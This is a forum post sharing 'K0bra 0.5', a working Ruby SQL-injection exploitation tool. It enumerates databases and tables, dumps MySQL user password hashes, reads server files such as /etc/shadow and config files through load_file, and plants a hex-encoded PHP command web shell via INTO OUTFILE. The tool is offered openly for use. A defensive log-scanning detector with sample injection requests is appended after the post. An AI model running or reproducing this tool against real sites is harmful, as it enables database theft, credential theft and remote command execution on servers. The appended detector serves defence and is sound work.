[Ruby] K0bra 0.5

BigBear

  • on: July 24, 2015, 01:12:31 pm
Improved version of this Ruby script for scanning a page for the SQLI vulnerability.

The script has the following options:

  • Check vulnerability
  • Find the number of columns
  • Automatically find the number that displays data
  • Show tables
  • Show columns
  • Show databases
  • Show tables of another DB
  • Show columns of a table of another DB
  • Show users from mysql.user
  • Search for files using load_file
  • Show a file using load_file
  • Show values
  • Show information about the DB
  • Create a shell using outfile
  • Everything is saved in ordered logs

    The code:

    Code: Ruby
    #!/usr/bin/ruby
    #K0bra 0.5
    #(C) Doddy Hackman 2015
    
    require "net/http"
    require "open-uri"
    
    $files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log',
    '/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini',
    '/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf',
    '/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog']
    
    def toma(web)
      begin
        return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
      rescue
        return "Error"
      end
    end
    
    def decode_hex(text)
      text = text.sub("0x","")
      return [text].pack('H*')[0]
    end
    
    def encode_hex(text)
      return "0x"+text.unpack('H*')[0]
    end
    
    def copyright()
      print "\n-- == (C) Doddy Hackman 2015 == --\n"
      gets.chomp
      exit(1)
    end
    
    def installer()
      dir = Dir::pwd+"/"+"logs_webs"
      if not FileTest::directory?(dir)
        Dir::mkdir(dir)
      end
    end
    
    def savefile(file,text)
      url = URI.parse(file)
      save = File.open("logs_webs/"+url.host+".txt","a")
      save.puts text+"\n"
      save.close
    end
    
    def bypass(op)
      if op=="--"
        return "+","--"
      elsif op=="/*"
        return "/**/","/**/"
      elsif op=="%20"
        return "%20","%00"
      else
        return "+","--"
      end
    end
    
    def head()
      clean()
      print "
    
    @      @@   @            
    @@     @  @ @@            
    @ @@  @  @  @ @   @ @ @@@
    @ @   @  @  @@ @ @@@ @  @
    @@    @  @  @  @  @   @@@
    @ @   @  @  @  @  @  @  @
    @@@ @   @@   @@@  @@@ @@@@@
    
    "
    end
    
    def volverinicio()
      print "\n\n[+] Press any key to continue\n\n"
      gets.chomp
      inicio()
    end
    
    def clean()
      if RUBY_PLATFORM=~/win/ or RUBY_PLATFORM=~/min/
        system("cls")
      else
        system("clear")
      end
    end
    
    def retorno(url,by)
      print "\n[+] Finished"
      print "\n\n[+] Press any key to continue\n\n"
      gets.chomp
      central(url,by)
    end
    
    def gettables(url,by)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
      print "\n[+] Getting tables ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Tables Found : ",total,"\n\n"
        savefile(url,"\n[+] Tables Found : #{total}\n")
        for num in ("17"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1
            print "[+] Table Found : "+table+"\n"
            savefile(url,"[+] Table Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end
    
    def getcolumns(url,by,tablex)
      tablexa = encode_hex(tablex)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
      print "\n[+] Getting columns ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Columns Found : ",total,"\n\n"
        savefile(url,"\n[+] Table : #{tablex}")
        savefile(url,"[+] Columns Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1
            print "[+] Column Found : "+table+"\n"
            savefile(url,"[+] Column Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end
    
    def getdbs(url,by)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
      print "\n[+] Getting DBS ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] DBS Found : ",total,"\n\n"
        savefile(url,"\n[+] DBS Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1
            print "[+] DB Found : "+table+"\n"
            savefile(url,"[+] DB Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end
    
    def gettablesbydb(url,by,dbx)
      data  = encode_hex(dbx)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
      print "\n[+] Getting tables ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Tables Found : ",total,"\n\n"
        savefile(url,"\n[+] DBS : #{dbx}")
        savefile(url,"[+] Tables Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1
            print "[+] Table Found : "+table+"\n"
            savefile(url,"[+] Table Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end
    
    def getcolumnsbydb(url,by,db,tab)
      data = encode_hex(db)
      tabx = encode_hex(tab)
    
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
      print "\n[+] Getting columns ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Columns Found : ",total,"\n\n"
        savefile(url,"\n[+] DB : #{db}")
        savefile(url,"[+] Table : #{tab}")
        savefile(url,"[+] Columns Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1
            print "[+] Column Found : "+table+"\n"
            savefile(url,"[+] Column Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end
    
    def mysqluser(url,by)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
      print "\n[+] Searching mysql.user\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Users Mysql Found : ",total,"\n\n"
        savefile(url,"[+] Users Mysql Found : "+total+"\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
            host,user,passw = $1,$2,$3
            print "[Host] : "+host
            print " [User] : "+user
            print " [Pass] : "+passw+"\n"
            savefile(url,"[Host] : "+host)
            savefile(url,"[User] : "+user)
            savefile(url,"[Pass] : "+passw+"\n")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end
    
    def details(url,by)
      pass1,pass2 = bypass(by)
      hextest = "0x2f6574632f706173737764" #/etc/passwd
      hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
      web1 = url.sub(/hackman/,"0x4b30425241")
      web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
      web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
      print "\n[+] Extracting information of the DB\n"
      code1 = toma(web2)
      if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
        user,data,ver = $1,$2,$3
        print "\n[+] Username : "+user
        print "\n[+] Database : "+data
        print "\n[+] Version : "+ver+"\n\n"
        savefile(url,"\n[+] Username : "+user)
        savefile(url,"[+] Database : "+data)
        savefile(url,"[+] Version : "+ver+"\n")
      else
        print "[-] Not Found\n"
      end
      code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
      code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
      code4 = toma(web3)
      if code2=~/K0BRA/
        print "[+] Mysql User : ON\n"
        savefile(url,"[+] Mysqluser : ON")
      end
      if code3=~/K0BRA/
        print "[+] information_schema : ON\n"
        savefile(url,"[+] information_schema : ON")
      end
      if code4=~/ERTOR854/
        print "[+] load_file : ON\n"
        savefile(url,"[+] load_file : ON")
      end
      savefile(url,"") #blank line
    end
    
    def dumper(url,by,table,col1,col2)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))")
      print "\n[+] Getting Values ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+table+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        savefile(url,"\n[+] Table : "+table)
        savefile(url,"[+] Column 1 : "+col1)
        savefile(url,"[+] Column 2 : "+col2)
        print "[+] Values Found : ",total,"\n"
        savefile(url,"\n[+] Values Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/
            uno,dos = $1,$2
            print "\n[+] "+col1+" : "+uno+"\n"
            print "[+] "+col2+" : "+dos+"\n"
            savefile(url,"\n[+] "+col1+" : "+uno)
            savefile(url,"[+] "+col2+" : "+dos)
          end
        end
      else
        print "[-] Not Found\n"
      end
    end
    
    def fuzzfile(url,by)
      pass1,pass2 = bypass(by)
      print "\n[+] Fuzzing Files with load_file ....\n"
      $files.each do |file|
        res = file
        file = file.chomp
        file = encode_hex(file)
        web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
        code = toma(web1)
        if code=~/ERTOR854(.*?)ERTOR854/m
          print "\n\n[File Found] : ",res
          print "\n\n[Source Start]\n"
          print $1
          print "\n[Source End]"
          savefile(url,"\n[File Found] : "+res)
          savefile(url,"\n[Source Start]\n")
          savefile(url,$1)
          savefile(url,"\n[Source End]")
        end
      end
      print "\n"
    end
    
    def abrirfile(url,by,file)
      pass1,pass2 = bypass(by)
      print "\n[+] Opening file ....\n"
      res = file
      file = encode_hex(file)
      web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
      code = toma(web1)
      if code=~/ERTOR854(.*?)ERTOR854/m
        print "\n\n[File Found] : ",res
        print "\n\n[Source Start]\n"
        print $1
        print "\n[Source End]\n"
        savefile(url,"\n[File Found] : "+res)
        savefile(url,"\n[Source Start]\n")
        savefile(url,$1)
        savefile(url,"\n[Source End]\n")
      else
        print "\n\n[-] Error\n\n"
      end
    end
    
    def into(url,by,full,dir)
      pass1,pass2 = bypass(by)
      linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
      lugar = full+"/cmd.php"
      lugardos = dir+"/cmd.php"
      h = URI.parse(url)
      webtest = "http://"+h.host+lugardos
      web1 = url.sub(/hackman/,linea)
      formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
      toma(formandoweb)
      code = toma(webtest)
      if code=~/Mini Shell By Doddy/
        print "\n[Shell Up] : "+webtest+"\n"
        savefile(url,"\n[Shell Up] : "+webtest+"\n")
      else
        print "\n\n[-] Error\n"
      end
    end
    
    def central(url,by)
      clean()
      head()
      print "\n\n[+] Page : #{url}\n"
      print "[+] ByPass : #{by}\n\n"
    
      print "\n[information_schema]\n\n"
      print "1 - Show tables\n"
      print "2 - Show columns of a table\n"
      print "3 - Show databases\n"
      print "4 - Show tables from a DB\n"
      print "5 - Show columns from a table of the DB\n"
      print "\n[mysql.user]\n\n"
      print "6 - Show users\n"
      print "\n[Others]\n\n"
      print "7 - Show details\n"
      print "8 - Dump data\n"
      print "9 - Fuzz Files with load_file\n"
      print "10 - Load files with load_file\n"
      print "11 - Create Shell\n"
      print "12 - Show log\n"
      print "13 - Change target\n"
      print "14 - Exit\n\n\n"
    
      print "[+] Option : "
      op = gets.chomp
      print "\n"
    
      if op == "1"
        gettables(url,by)
        retorno(url,by)
      elsif op == "2"
        print "\n[+] Table : "
        table = gets.chomp
        getcolumns(url,by,table)
        retorno(url,by)
      elsif op == "3"
        getdbs(url,by)
        retorno(url,by)
      elsif op == "4"
        print "\n[+] DB : "
        db = gets.chomp
        gettablesbydb(url,by,db)
        retorno(url,by)
      elsif op == "5"
        print "\n[+] DB : "
        db = gets.chomp
        print "\n[+] Table : "
        tab = gets.chomp
        getcolumnsbydb(url,by,db,tab)
        retorno(url,by)
      elsif op == "6"
        mysqluser(url,by)
        retorno(url,by)
      elsif op == "7"
        details(url,by)
        retorno(url,by)
      elsif op == "8"
        print "\n[+] Table : "
        table = gets.chomp
        print "\n[+] Column 1 : "
        col1 = gets.chomp
        print "\n[+] Column 2 : "
        col2 = gets.chomp
        dumper(url,by,table,col1,col2)
        retorno(url,by)
      elsif op == "9"
        fuzzfile(url,by)
        retorno(url,by)
      elsif op == "10"
        print "\n[+] File : "
        file = gets.chomp
        abrirfile(url,by,file)
        retorno(url,by)
      elsif op == "11"
        print "\n[Full Source Disclosure] : "
        full = gets.chomp
        print "\n[Directory to test] : "
        dir = gets.chomp
        into(url,by,full,dir)
        retorno(url,by)
      elsif op == "12"
        urla = URI.parse(url)
        ar = "logs_webs/"+urla.host+".txt"
        system("start #{ar}")
        retorno(url,by)
      elsif op == "13"
        inicio()
      elsif op == "14"
        copyright()
      else
        retorno(url,by)
      end
    end
    
    def findlength(url,by)
      pass1,pass2 = bypass(by)
      z = "1"
      print "\n[+] Finding columns length ...\n\n"
      x = "concat(0x4b30425241,1,0x4b30425241)"
      for num in ('2'..'25')
        z = z+","+num
        x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
        code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
        if code=~/K0BRA(.*?)K0BRA/
          print "[+] The Page has "+num+" columns\n"
          print "[+] The number "+$1+" print data"
          z = z.sub($1,"hackman")
          sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
          savefile(url,"[+] SQLI : "+sqli)
          savefile(url,"[+] Bypass : "+by+"\n")
          central(sqli,by)
        end
      end
      print "[-] Columns length not found\n"
      volverinicio()
    end
    
    def testvul(page,by)
      pass1,pass2 = bypass(by)
      print "\n\n[+] Testing vulnerability ...\n\n"
      codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
      codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
      if codeuno != codedos
        print "[+] Vulnerable !\n"
        findlength(page,by)
      else
        print "[-] Not vulnerable\n"
        print "\n[+] Scan anyway y/n : "
        op = gets.chomp
        if op == "y"
          findlength(page,by)
        else
          volverinicio()
        end
      end
    end
    
    def inicio()
      clean()
      head()
      print "\n\n[+] Page : "
      page = gets.chomp
      print "\n[+] Bypass : "
      by = gets.chomp
      if page=~/hackman/
        central(page,by)
      else
        testvul(page,by)
      end
    end
    
    installer()
    inicio()
    
    # The End ?
    

    That's all.
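As an added, defensive example (not part of the post or of Doddy's script): a Ruby detector that recognises K0bra's own request shapes in web-server access logs, using the values the script above hard-codes (the and 1=0 / and 1=1 test pair, the 0x4b30425241 "K0BRA" marker, information_schema and mysql.user enumeration, the char(69,82,84,79,82,56,53,52) "ERTOR854" marker around load_file, and into outfile). The combined log format, the severity ladder, the boolean-pair correlation and the sample lines are assumptions of this example.

```ruby
require "cgi"
require "set"

# Signatures taken from the K0bra 0.5 script above: the "and 1=0" / "and 1=1"
# test pair, the 0x4b30425241 ("K0BRA") column marker, information_schema and
# mysql.user enumeration, the char(69,82,84,79,82,56,53,52) ("ERTOR854")
# marker around load_file(), and the "into outfile" probe used to drop cmd.php.
SIGNATURES = {
  boolean_test: /\band\s+1=[01]\b/i,
  union_probe:  /\bunion\s+select\b/i,
  k0bra_marker: /0x4b30425241/i,
  schema_enum:  /\b(information_schema\.(tables|columns|schemata)|mysql\.user)\b/i,
  load_file:    /\bload_file\(/i,
  ertor_marker: /char\(69,82,84,79,82,56,53,52\)/i,
  outfile_drop: /\binto\s+outfile\b/i,
}.freeze

# Severity ladder (assumption of this example): a write to disk outranks file
# reads and schema enumeration, which outrank the column-count probes.
SEVERITY_RULES = [
  [:critical, [:outfile_drop]],
  [:high,     [:load_file, :ertor_marker, :schema_enum]],
  [:medium,   [:union_probe, :k0bra_marker]],
  [:low,      [:boolean_test]],
].freeze

# Apache/nginx "combined" access-log format; assumed to be the log source.
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) \S+ "[^"]*" "(?<ua>[^"]*)"/

# Collapse the separators bypass() can emit ('+', '%20', '/**/', '%00') into
# single spaces so every signature matches one normalised form.
def normalize_query(raw_path)
  decoded = CGI.unescape(raw_path.to_s) # maps '+' and %xx escapes
  decoded.gsub(%r{/\*\*/}, " ").gsub("\u0000", " ").gsub(/\s+/, " ")
end

# Names of the signatures that fire on one request path.
def classify_request(raw_path)
  query = normalize_query(raw_path)
  SIGNATURES.select { |_name, re| query.match?(re) }.keys
end

# Highest severity reached by a hit list, or nil when nothing fired.
def severity_for(hits)
  SEVERITY_RULES.each do |level, names|
    return level unless (names & hits).empty?
  end
  nil
end

# One finding per log line whose request matches at least one signature.
def scan_log(lines)
  lines.map do |line|
    m = LOG_LINE.match(line)
    next unless m
    hits = classify_request(m[:path])
    next if hits.empty?
    { ip: m[:ip], ts: m[:ts], path: m[:path], hits: hits, severity: severity_for(hits) }
  end.compact
end

# testvul() decides "Vulnerable !" by comparing the 1=0 and 1=1 responses, so
# report every (source, script) pair that sent both variants in the window.
def boolean_pairs(findings)
  seen = Hash.new { |h, k| h[k] = Set.new }
  findings.each do |f|
    next unless f[:hits].include?(:boolean_test)
    script = f[:path].split("?", 2).first
    seen[[f[:ip], script]] << normalize_query(f[:path])[/\band 1=([01])/i, 1]
  end
  seen.select { |_key, forms| forms.size == 2 }.keys
end

# Constructed sample traffic (documentation IP ranges); the request shapes
# follow testvul(), findlength(), gettables(), abrirfile() and into() above.
UA = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0".freeze
SAMPLE_LOG = [
  %{203.0.113.7 - - [24/Jul/2015:13:12:31 -0300] "GET /news.php?id=1+and+1=0-- HTTP/1.1" 200 512 "-" "#{UA}"},
  %{203.0.113.7 - - [24/Jul/2015:13:12:32 -0300] "GET /news.php?id=1+and+1=1-- HTTP/1.1" 200 4096 "-" "#{UA}"},
  %{203.0.113.7 - - [24/Jul/2015:13:12:33 -0300] "GET /news.php?id=1+and+1=0+union+select+concat(0x4b30425241,1,0x4b30425241),concat(0x4b30425241,2,0x4b30425241) HTTP/1.1" 200 4100 "-" "#{UA}"},
  %{203.0.113.7 - - [24/Jul/2015:13:12:34 -0300] "GET /news.php?id=1+and+1=0+union+select+1,unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))+from+information_schema.tables-- HTTP/1.1" 200 4100 "-" "#{UA}"},
  %{203.0.113.7 - - [24/Jul/2015:13:12:35 -0300] "GET /news.php?id=1+and+1=0+union+select+1,unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764),char(69,82,84,79,82,56,53,52))))-- HTTP/1.1" 200 6000 "-" "#{UA}"},
  %{203.0.113.7 - - [24/Jul/2015:13:12:36 -0300] "GET /news.php?id=1+and+1=0+union+select+1,2+into+outfile+%27/var/www/cmd.php%27-- HTTP/1.1" 200 4100 "-" "#{UA}"},
  %{198.51.100.4 - - [24/Jul/2015:13:13:00 -0300] "GET /news.php?id=7 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"},
].freeze

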